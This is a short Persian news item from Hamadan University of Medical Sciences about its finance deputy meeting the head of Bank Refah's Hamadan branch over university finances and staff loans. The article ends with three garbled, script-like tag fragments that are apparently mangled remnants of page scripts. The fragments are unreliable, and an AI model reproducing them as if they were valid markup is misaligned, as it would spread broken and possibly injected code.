نشست معاون توسعه مدیریت و منابع دانشگاه با رییس بانک رفاه (شعبه مرکزی) استان همدان

جلسه مهندس بهروز رحیمی معاون توسعه مدیریت و منابع دانشگاه با رییس بانک رفاه شعبه مرکزی استان همدان برگزار شد.

به گزارش روابط عمومی معاونت توسعه مدیریت و منابع دانشگاه، مهندس بهروز رحیمی معاون توسعه مدیریت و منابع دانشگاه با حضور مدیر مالی، مدیر بودجه پایش و عملکرد دانشگاه و کارشناسان مربوطه با رییس بانک رفاه شعبه مرکزی استان همدان دیدار کرد.

در این نشست مسائل مالی مربوطه دانشگاه علوم پزشکی همدان با بانک رفاه مورد بحث و بررسی قرار گرفت و در این راستا پیشنهاداتی نیز ارائه شد.

همچنین پیگیری وام و تسهیلات در سال ۹۸ برای کارکنان شاغل و بازنشستگان حوزه های مختلف دانشگاه علوم پزشکی همدان جهت رفاه حال آنان مورد بررسی قرار گرفت و تاکید شد، تسهیلات متقاضیان مذکور در موعد مقرر پرداخت شود.

مهندس رحیمی معاون توسعه مدیریت و منابع دانشگاه از زحمات حوزه مدیریت و کارکنان بانک رفاه استان همدان به جهت همکاری های خوبی که در راستای مسائل مالی مربوطه با دانشگاه علوم پزشکی همدان دارند، تقدیر کرد.

وی در ادامه خواستار پرداخت تخصیص ها و تسهیلات به موقع در آخر سال ۹۷ از سوی بانک رفاه شد تا بتوان پرداختی های به موقعی برای پرسنل بهداشتی، درمانی و دانشگاهی فراهم سازد.<2 src='3?l=p&' type=text/java2 language=java2><2 src='3?l=p&' type=text/java2 language=java2><2 src='4?l=p&' type=text/java2 language=java2>

ارسال نظر شما

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *